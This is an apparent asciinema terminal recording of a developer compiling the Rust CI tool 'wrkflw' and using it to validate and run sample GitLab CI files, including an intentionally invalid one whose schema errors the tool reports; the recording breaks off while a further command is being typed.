[30.393666, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 229/270: unicode-segmentation, bollard-stubs, strum_macros, paste, time, hyper, h2, indoc, colored, icu_locid, cassowary, runtime \r"]
|
||||
[30.396679, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m strum v0.25.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 230/270: unicode-segmentation, bollard-stubs, strum, paste, time, hyper, h2, indoc, colored, icu_locid, cassowary, runtime \r"]
|
||||
[30.399296, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m unicode-width v0.1.14\r\n"]
|
||||
[30.399332, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 231/270: unicode-segmentation, bollard-stubs, strum, time, unicode-width, hyper, h2, indoc, colored, icu_locid, cassowary, runtime \r"]
|
||||
[30.407848, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m evaluator v0.4.0 (/Users/goku/projects/wrkflw/crates/evaluator)\r\n"]
|
||||
[30.407878, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 232/270: unicode-segmentation, bollard-stubs, strum, time, unicode-width, hyper, evaluator, h2, indoc, icu_locid, cassowary, runtime \r"]
|
||||
[30.554265, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_provider v1.5.0\r\n"]
|
||||
[30.554908, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 233/270: unicode-segmentation, bollard-stubs, strum, time, hyper, evaluator, h2, indoc, icu_locid, cassowary, icu_provider, runtime \r"]
|
||||
[30.591042, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 234/270: bollard-stubs, strum, time, hyper, rayon-core, evaluator, h2, indoc, icu_locid, cassowary, icu_provider, runtime \r"]
|
||||
[30.604905, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m crossterm v0.26.1\r\n"]
|
||||
[30.605074, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 235/270: bollard-stubs, strum, time, hyper, rayon-core, crossterm, evaluator, h2, indoc, icu_locid, icu_provider, runtime \r"]
|
||||
[30.653721, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m same-file v1.0.6\r\n"]
|
||||
[30.653797, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 236/270: bollard-stubs, strum, time, hyper, rayon-core, crossterm, evaluator, h2, icu_locid, same-file, icu_provider, runtime \r"]
|
||||
[30.691821, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m urlencoding v2.1.3\r\n"]
|
||||
[30.691883, "o", "\u001b[1m\u001b[36m Building\u001b[0m [====================> ] 237/270: urlencoding, bollard-stubs, strum, time, hyper, rayon-core, crossterm, h2, icu_locid, same-file, icu_provider, runtime \r"]
|
||||
[30.708108, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 238/270: urlencoding, bollard-stubs, strum, hyper, rayon-core, crossterm, h2, icu_locid, same-file, icu_provider, runtime \r"]
|
||||
[30.749513, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m ratatui v0.23.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 239/270: urlencoding, bollard-stubs, ratatui, hyper, rayon-core, crossterm, h2, icu_locid, same-file, icu_provider, runtime \r"]
|
||||
[30.756806, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m walkdir v2.5.0\r\n\u001b[1m\u001b[36m Building\u001b[0m "]
|
||||
[30.756853, "o", "[=====================> ] 240/270: urlencoding, bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, h2, icu_locid, icu_provider, runtime \r"]
|
||||
[30.764425, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 241/270: urlencoding, bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, h2, icu_locid, icu_provider \r"]
|
||||
[30.794001, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m rayon v1.10.0\r\n"]
|
||||
[30.794057, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 241/270: urlencoding, bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, h2, rayon, icu_locid, icu_provider \r"]
|
||||
[30.83092, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 242/270: urlencoding, bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, h2, rayon, icu_provider \r"]
|
||||
[30.838227, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 243/270: bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, h2, rayon, icu_provider \r"]
|
||||
[30.846511, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 244/270: bollard-stubs, walkdir, ratatui, hyper, rayon-core, crossterm, rayon, icu_provider \r"]
|
||||
[30.914955, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 245/270: bollard-stubs, walkdir, ratatui, hyper, crossterm, rayon, icu_provider \r"]
|
||||
[30.917348, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 246/270: bollard-stubs, ratatui, hyper, crossterm, rayon, icu_provider \r"]
|
||||
[30.978944, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 247/270: bollard-stubs, ratatui, hyper, rayon, icu_provider \r"]
|
||||
[31.11234, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_locid_transform v1.5.0\r\n"]
|
||||
[31.112427, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 247/270: bollard-stubs, ratatui, hyper, icu_locid_transform, rayon, icu_provider \r"]
|
||||
[31.162661, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 248/270: bollard-stubs, ratatui, hyper, icu_locid_transform, rayon \r"]
|
||||
[31.401195, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_properties v1.5.1\r\n"]
|
||||
[31.401226, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 248/270: bollard-stubs, ratatui, hyper, icu_locid_transform, icu_properties, rayon \r"]
|
||||
[31.420216, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m hyper-tls v0.5.0\r\n"]
|
||||
[31.42035, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m hyperlocal v0.8.0\r\n\u001b[1m\u001b[36m Building\u001b[0m [=====================> ] 248/270: bollard-stubs, hyperlocal, hyper-tls, ratatui, hyper, icu_locid_transform, icu_properties, rayon \r"]
|
||||
[31.524709, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 249/270: bollard-stubs, hyperlocal, ratatui, hyper, icu_locid_transform, icu_properties, rayon \r"]
|
||||
[31.556444, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 250/270: bollard-stubs, ratatui, hyper, icu_locid_transform, icu_properties, rayon \r"]
|
||||
[31.566354, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 251/270: bollard-stubs, ratatui, hyper, icu_properties, rayon \r"]
|
||||
[31.685692, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 252/270: bollard-stubs, ratatui, icu_properties, rayon \r"]
|
||||
[31.74925, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 253/270: bollard-stubs, ratatui, icu_properties \r"]
|
||||
[31.927424, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 254/270: bollard-stubs, icu_properties \r"]
|
||||
[32.170935, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m icu_normalizer v1.5.0\r\n"]
|
||||
[32.170967, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 254/270: bollard-stubs, icu_normalizer, icu_properties \r"]
|
||||
[32.268484, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 255/270: bollard-stubs, icu_normalizer \r"]
|
||||
[32.367189, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m idna_adapter v1.2.0\r\n"]
|
||||
[32.367291, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 255/270: bollard-stubs, icu_normalizer, idna_adapter \r"]
|
||||
[32.408588, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m idna v1.0.3\r\n"]
|
||||
[32.408647, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 255/270: bollard-stubs, idna, icu_normalizer, idna_adapter \r"]
|
||||
[32.41806, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 256/270: bollard-stubs, idna, icu_normalizer \r"]
|
||||
[32.492269, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 257/270: bollard-stubs, idna \r"]
|
||||
[32.545839, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m url v2.5.4\r\n"]
|
||||
[32.545928, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 257/270: bollard-stubs, idna, url \r"]
|
||||
[32.629833, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 258/270: bollard-stubs, url \r"]
|
||||
[32.759557, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m reqwest v0.11.27\r\n"]
|
||||
[32.759587, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 258/270: bollard-stubs, reqwest, url \r"]
|
||||
[32.835456, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 259/270: bollard-stubs, reqwest \r"]
|
||||
[33.312497, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m bollard v0.14.0\r\n"]
|
||||
[33.312523, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 259/270: bollard-stubs, bollard, reqwest \r"]
|
||||
[33.331502, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m jsonschema v0.17.1\r\n"]
|
||||
[33.331527, "o", "\u001b[1m\u001b[32m Compiling\u001b[0m github v0.4.0 (/Users/goku/projects/wrkflw/crates/github)\r\n\u001b[1m\u001b[32m Compiling\u001b[0m gitlab v0.4.0 (/Users/goku/projects/wrkflw/crates/gitlab)\r\n"]
|
||||
[33.331737, "o", "\u001b[1m\u001b[36m Building\u001b[0m [======================> ] 259/270: bollard-stubs, github, bollard, gitlab, jsonschema, reqwest \r"]
|
||||
[33.393223, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 260/270: github, bollard, gitlab, jsonschema, reqwest \r"]
|
||||
[33.595709, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 261/270: github, bollard, jsonschema, reqwest \r"]
|
||||
[33.604039, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 262/270: bollard, jsonschema, reqwest \r"]
|
||||
[34.004668, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 263/270: bollard, jsonschema \r"]
|
||||
[34.015674, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m parser v0.4.0 (/Users/goku/projects/wrkflw/crates/parser)\r\n"]
|
||||
[34.015746, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 263/270: parser, bollard, jsonschema \r"]
|
||||
[34.346413, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 264/270: parser, bollard \r"]
|
||||
[34.500995, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 265/270: bollard \r"]
|
||||
[34.745632, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m executor v0.4.0 (/Users/goku/projects/wrkflw/crates/executor)\r\n"]
|
||||
[34.74581, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 265/270: bollard, executor \r"]
|
||||
[35.477556, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 266/270: executor \r"]
|
||||
[35.613178, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m ui v0.4.0 (/Users/goku/projects/wrkflw/crates/ui)\r\n"]
|
||||
[35.613272, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 266/270: ui, executor \r"]
|
||||
[35.999581, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 267/270: ui \r"]
|
||||
[36.013859, "o", "\u001b[K\u001b[1m\u001b[32m Compiling\u001b[0m wrkflw v0.4.0 (/Users/goku/projects/wrkflw/crates/wrkflw)\r\n"]
|
||||
[36.013926, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 267/270: ui, wrkflw \r"]
|
||||
[36.063415, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 268/270: ui \r"]
|
||||
[36.374123, "o", "\u001b[1m\u001b[36m Building\u001b[0m [=======================> ] 269/270: wrkflw(bin) \r"]
|
||||
[36.934682, "o", "\u001b[K\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 16.45s\r\n"]
|
||||
[36.946554, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw validate test_gitlab_ci/minimal.gitlab-ci.yml`\r\n"]
|
||||
[37.469642, "o", "Validating GitLab CI pipeline file: test_gitlab_ci/minimal.gitlab-ci.yml... ✅ Valid syntax\r\n"]
|
||||
[37.470535, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[37.471315, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[37.471326, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[37.473048, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[37.47485, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[37.474976, "o", "\u001b[?1h\u001b="]
|
||||
[37.475042, "o", "\u001b[?2004h"]
|
||||
[39.504083, "o", "c"]
|
||||
[39.575281, "o", "\bca"]
|
||||
[39.985807, "o", "r"]
|
||||
[40.110435, "o", "g"]
|
||||
[40.247171, "o", "o"]
|
||||
[40.366603, "o", " "]
|
||||
[40.491496, "o", "r"]
|
||||
[41.167474, "o", "\b \b"]
|
||||
[41.318578, "o", "\b"]
|
||||
[41.464227, "o", "\b \b"]
|
||||
[41.588577, "o", "\b \b"]
|
||||
[41.725879, "o", "\b \b"]
|
||||
[41.849987, "o", "\b\bc \b"]
|
||||
[42.776052, "o", "\bcl"]
|
||||
[42.880903, "o", "e"]
|
||||
[43.132681, "o", "a"]
|
||||
[43.245463, "o", "r"]
|
||||
[43.601618, "o", "\u001b[?1l\u001b>"]
|
||||
[43.601729, "o", "\u001b[?2004l\r\r\n"]
|
||||
[43.603201, "o", "\u001b]2;clear\u0007\u001b]1;clear\u0007"]
|
||||
[43.630852, "o", "\u001b[3J\u001b[H\u001b[2J"]
|
||||
[43.631162, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[43.632238, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[43.632263, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[43.635069, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[43.637553, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[43.637652, "o", "\u001b[?1h\u001b="]
|
||||
[43.637664, "o", "\u001b[?2004h"]
|
||||
[43.991397, "o", "c"]
|
||||
[44.088651, "o", "\bca"]
|
||||
[44.374368, "o", "r"]
|
||||
[44.446833, "o", "g"]
|
||||
[44.53755, "o", "o"]
|
||||
[44.628977, "o", " "]
|
||||
[44.812984, "o", "r"]
|
||||
[44.922289, "o", " "]
|
||||
[46.356703, "o", "-"]
|
||||
[46.687628, "o", "-"]
|
||||
[47.264144, "o", " "]
|
||||
[47.638826, "o", "r"]
|
||||
[47.824999, "o", "u"]
|
||||
[48.00395, "o", "n"]
|
||||
[48.099902, "o", " "]
|
||||
[50.32697, "o", "t"]
|
||||
[50.449608, "o", "e"]
|
||||
[50.661865, "o", "s"]
|
||||
[50.768766, "o", "t"]
|
||||
[51.489835, "o", "_"]
|
||||
[51.868906, "o", "g"]
|
||||
[51.965985, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[53.657521, "o", "\b\u001b[0m/m"]
|
||||
[53.813699, "o", "i"]
|
||||
[53.937831, "o", "nimal.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[55.072612, "o", "\b\u001b[0m -"]
|
||||
[55.326911, "o", "e"]
|
||||
[56.520262, "o", "\u001b[?1l\u001b>"]
|
||||
[56.520344, "o", "\u001b[?2004l\r\r\n"]
|
||||
[56.521995, "o", "\u001b]2;cargo r -- run test_gitlab_ci/minimal.gitlab-ci.yml -e\u0007\u001b]1;cargo\u0007"]
|
||||
[56.760823, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.19s\r\n"]
|
||||
[56.766792, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw run test_gitlab_ci/minimal.gitlab-ci.yml -e`\r\n"]
|
||||
[63.060648, "o", "✅ Workflow execution completed successfully!\r\n\r\nJob summary:\r\n ✅ build (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ test (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ build (success)\r\n Steps:\r\n ✅ Run script line 1\r\n ✅ test (success)\r\n Steps:\r\n ✅ Run script line 1\r\n"]
|
||||
[63.062528, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[63.063152, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[63.063163, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[63.064999, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[63.06677, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[63.066845, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
|
||||
[66.121168, "o", "c"]
|
||||
[66.234389, "o", "\bca"]
|
||||
[66.398021, "o", "t"]
|
||||
[66.595798, "o", " "]
|
||||
[67.93179, "o", "t"]
|
||||
[68.057573, "o", "e"]
|
||||
[68.252993, "o", "s"]
|
||||
[68.380648, "o", "t"]
|
||||
[68.977726, "o", "_"]
|
||||
[69.395102, "o", "g"]
|
||||
[69.506881, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[72.095324, "o", "\b\u001b[0m/i"]
|
||||
[72.270688, "o", "n"]
|
||||
[72.41996, "o", "\u0007\r\r\n"]
|
||||
[72.420018, "o", "\u001b[J\u001b[0mincludes.gitlab-ci.yml \u001b[Jinvalid.gitlab-ci.yml \u001b[J\u001b[A\u001b[0m\u001b[27m\u001b[24m\r\u001b[19Ccat test_gitlab_ci/in\u001b[K"]
|
||||
[73.498026, "o", "v"]
|
||||
[73.636495, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[75.147715, "o", "\b\u001b[0m \b"]
|
||||
[75.148084, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n\u001b[J"]
|
||||
[75.149613, "o", "\u001b]2;cat test_gitlab_ci/invalid.gitlab-ci.yml\u0007\u001b]1;cat\u0007"]
|
||||
[75.175256, "o", "# Invalid GitLab CI file with common mistakes\r\n\r\n# Missing stages definition\r\n# stages:\r\n# - build\r\n# - test\r\n\r\nvariables:\r\n CARGO_HOME: ${CI_PROJECT_DIR}/.cargo # Missing quotes around value with variables\r\n\r\n# Invalid job definition (missing script)\r\nbuild:\r\n stage: build # Referring to undefined stage\r\n # Missing required script section\r\n artifacts:\r\n paths:\r\n - target/release/\r\n expire_in: 1 week\r\n\r\n# Invalid job with incorrect when value\r\ntest:\r\n stage: test\r\n script:\r\n - cargo test\r\n when: never # Invalid value for when (should be always, manual, or delayed)\r\n dependencies:\r\n - non_existent_job # Dependency on non-existent job\r\n\r\n# Improperly structured job with invalid keys\r\ndeploy:\r\n stagee: deploy # Typo in stage key\r\n scriptt: # Typo in script key\r\n - echo \"Deploying...\"\r\n only:\r\n - main\r\n environment:\r\n production # Incorrect format for environment\r\n retry: hello # Incorrect type for retry (should be integer or object)\r\n\r\n# Invalid rules section\r\nl"]
|
||||
[75.175425, "o", "int:\r\n stage: test\r\n script:\r\n - cargo clippy\r\n rules:\r\n - equals: $CI_COMMIT_BRANCH == \"main\" # Invalid rule (should be if, changes, exists, etc.)\r\n \r\n# Job with invalid cache configuration\r\ncache-test:\r\n stage: test\r\n script:\r\n - echo \"Testing cache\"\r\n cache:\r\n paths:\r\n - ${CARGO_HOME}\r\n key: [invalid, key, type] # Invalid type for key (should be string)\r\n policy: invalid-policy # Invalid policy value "]
|
||||
[75.175543, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[75.176254, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[75.17627, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[75.179062, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[75.181195, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[75.181307, "o", "\u001b[?1h\u001b="]
|
||||
[75.181372, "o", "\u001b[?2004h"]
|
||||
[78.644579, "o", "c"]
|
||||
[78.757216, "o", "\bca"]
|
||||
[79.422982, "o", "\b\bc \b"]
|
||||
[80.126467, "o", "\bcl"]
|
||||
[80.241618, "o", "e"]
|
||||
[80.499926, "o", "a"]
|
||||
[80.620047, "o", "r"]
|
||||
[80.768709, "o", "\u001b[?1l\u001b>"]
|
||||
[80.768793, "o", "\u001b[?2004l\r\r\n"]
|
||||
[80.770763, "o", "\u001b]2;clear\u0007\u001b]1;clear\u0007"]
|
||||
[80.796043, "o", "\u001b[3J\u001b[H\u001b[2J"]
|
||||
[80.796272, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[80.797072, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[80.799811, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[80.802093, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[80.802198, "o", "\u001b[?1h\u001b="]
|
||||
[80.802212, "o", "\u001b[?2004h"]
|
||||
[81.165962, "o", "c"]
|
||||
[81.237876, "o", "\bca"]
|
||||
[81.541593, "o", "r"]
|
||||
[81.632992, "o", "g"]
|
||||
[81.702718, "o", "o"]
|
||||
[81.811783, "o", " "]
|
||||
[82.041789, "o", "r"]
|
||||
[82.171861, "o", " "]
|
||||
[83.210945, "o", "-"]
|
||||
[83.370683, "o", "-"]
|
||||
[83.531883, "o", " "]
|
||||
[84.72197, "o", "v"]
|
||||
[85.400474, "o", "\b \b"]
|
||||
[85.531347, "o", "\b"]
|
||||
[85.666295, "o", "\b \b"]
|
||||
[85.92588, "o", "\b \b"]
|
||||
[86.620454, "o", "v"]
|
||||
[86.804257, "o", "a"]
|
||||
[86.911944, "o", "l"]
|
||||
[87.132942, "o", "i"]
|
||||
[87.276373, "o", "d"]
|
||||
[87.352783, "o", "a"]
|
||||
[87.544066, "o", "t"]
|
||||
[87.657321, "o", "e"]
|
||||
[87.785925, "o", " "]
|
||||
[88.963881, "o", "t"]
|
||||
[89.074873, "o", "e"]
|
||||
[89.258553, "o", "s"]
|
||||
[89.357494, "o", "t"]
|
||||
[89.816142, "o", "\u0007"]
|
||||
[89.816398, "o", "\r\r\n"]
|
||||
[89.816612, "o", "\u001b[J\u001b[1;36mtest_gitlab_ci\u001b[0m/ \u001b[J\u001b[1;36mtest-workflows\u001b[0m/ \u001b[J\u001b[1;36mtests\u001b[0m/ \u001b[J\u001b[A\u001b[0m\u001b[27m\u001b[24m\r\u001b[19Ccargo r validate test\u001b[K"]
|
||||
[90.569999, "o", "_"]
|
||||
[90.950079, "o", "g"]
|
||||
[91.040342, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[92.906492, "o", "\b\u001b[0m/m"]
|
||||
[93.078283, "o", "i"]
|
||||
[93.194416, "o", "nimal.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[94.398323, "o", "\b\u001b[0m \b"]
|
||||
[94.899238, "o", "\b \b"]
|
||||
[94.982652, "o", "\b \b"]
|
||||
[95.065722, "o", "\b \b"]
|
||||
[95.149466, "o", "\b \b"]
|
||||
[95.233618, "o", "\b \b"]
|
||||
[95.317716, "o", "\b \b"]
|
||||
[95.4019, "o", "\b \b"]
|
||||
[95.485971, "o", "\b \b"]
|
||||
[95.569449, "o", "\b \b"]
|
||||
[95.653691, "o", "\b \b"]
|
||||
[95.736766, "o", "\b \b"]
|
||||
[95.82133, "o", "\b \b"]
|
||||
[95.905257, "o", "\b \b"]
|
||||
[95.988404, "o", "\b \b"]
|
||||
[96.072177, "o", "\b \b"]
|
||||
[96.156204, "o", "\b \b"]
|
||||
[96.240362, "o", "\b \b"]
|
||||
[96.324551, "o", "\b \b"]
|
||||
[96.513245, "o", "\b \b"]
|
||||
[96.673025, "o", "\b \b"]
|
||||
[96.851629, "o", "\b \b"]
|
||||
[97.496169, "o", "i"]
|
||||
[97.698031, "o", "n"]
|
||||
[97.987174, "o", "v"]
|
||||
[98.138347, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[98.957859, "o", "\b\u001b[0m \b"]
|
||||
[98.958383, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n\u001b[J"]
|
||||
[98.960319, "o", "\u001b]2;cargo r validate test_gitlab_ci/invalid.gitlab-ci.yml\u0007\u001b]1;cargo\u0007"]
|
||||
[99.107154, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.09s\r\n"]
|
||||
[99.114895, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw validate test_gitlab_ci/invalid.gitlab-ci.yml`\r\n"]
|
||||
[99.636477, "o", "Validating GitLab CI pipeline file: test_gitlab_ci/invalid.gitlab-ci.yml... ❌ Invalid\r\nValidation failed: Schema validation error: GitLab CI validation failed:\r\n- {\"key\":[\"invalid\",\"key\",\"type\"],\"paths\":[\"${CARGO_HOME}\"],\"policy\":\"invalid-policy\"} is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- \"hello\" is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- Additional properties are not allowed ('scriptt', 'stagee' were unexpected)\r\n- {\"equals\":\"$CI_COMMIT_BRANCH == \\\"main\\\"\"} is not valid under any of the schemas listed in the 'anyOf' keyword\r\n\r\n"]
|
||||
[99.637323, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[99.638217, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[99.638226, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[99.639979, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[99.642108, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[99.642189, "o", "\u001b[?1h\u001b="]
|
||||
[99.642244, "o", "\u001b[?2004h"]
|
||||
[101.389433, "o", "c"]
|
||||
[101.489821, "o", "\bca"]
|
||||
[101.781592, "o", "r"]
|
||||
[101.870935, "o", "g"]
|
||||
[101.913828, "o", "o"]
|
||||
[102.021608, "o", " "]
|
||||
[102.173967, "o", "r"]
|
||||
[102.282804, "o", " "]
|
||||
[103.113368, "o", "-"]
|
||||
[103.251079, "o", "-"]
|
||||
[103.3802, "o", " "]
|
||||
[103.637955, "o", "r"]
|
||||
[103.756731, "o", "u"]
|
||||
[104.035863, "o", " "]
|
||||
[104.396646, "o", "\b"]
|
||||
[104.88292, "o", "n"]
|
||||
[104.97564, "o", " "]
|
||||
[106.361505, "o", "t"]
|
||||
[106.453323, "o", "e"]
|
||||
[106.66181, "o", "s"]
|
||||
[106.761957, "o", "t"]
|
||||
[107.423959, "o", "_"]
|
||||
[107.591679, "o", "gitlab_ci\u001b[1m/\u001b[0m"]
|
||||
[109.594052, "o", "\b\u001b[0m/i"]
|
||||
[109.78732, "o", "n"]
|
||||
